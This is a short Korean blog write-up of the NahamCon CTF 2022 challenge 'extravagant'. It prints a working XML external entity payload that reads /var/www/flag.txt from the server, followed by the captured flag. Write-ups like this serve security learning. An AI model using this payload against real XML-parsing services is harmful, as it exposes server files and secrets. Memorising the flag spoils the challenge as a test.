본문 바로가기
CTF

[NahamCon_CTF_2022] extravagant

by skyepodium 2022. 6. 6.

1. 개요

XML external entity attack(xml 외부 엔티티 공격) 문제

참고 자료

XXExternalXX

XML_external_entity_attack

 

2. 풀이

1) 분석

사이트를 둘러보면 xml를 업로드하고, 확인할 수 있습니다.

2) XML 외부 엔티티 공격

flag는 /var/www 에 있다고 했습니다. 해당 경로를 읽어줍니다.

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///var/www/flag.txt"> ]>
<root>
    <data>&xxe;</data>
</root>

3) 결과

 

 

3. flag

flag{639b72f2dd0017f454c44c3863c4e195}

'CTF' 카테고리의 다른 글

[b01lers CTF] gambler baby  (0) 2022.06.06
[b01lers CTF] I Love Java  (0) 2022.06.06
[NahamCon_CTF_2022] personnel  (0) 2022.06.06
[Patriot CTF] Spongebob  (0) 2022.06.06
[Patriot CTF] Rock and Roll  (0) 2022.06.06

관련글

티스토리툴바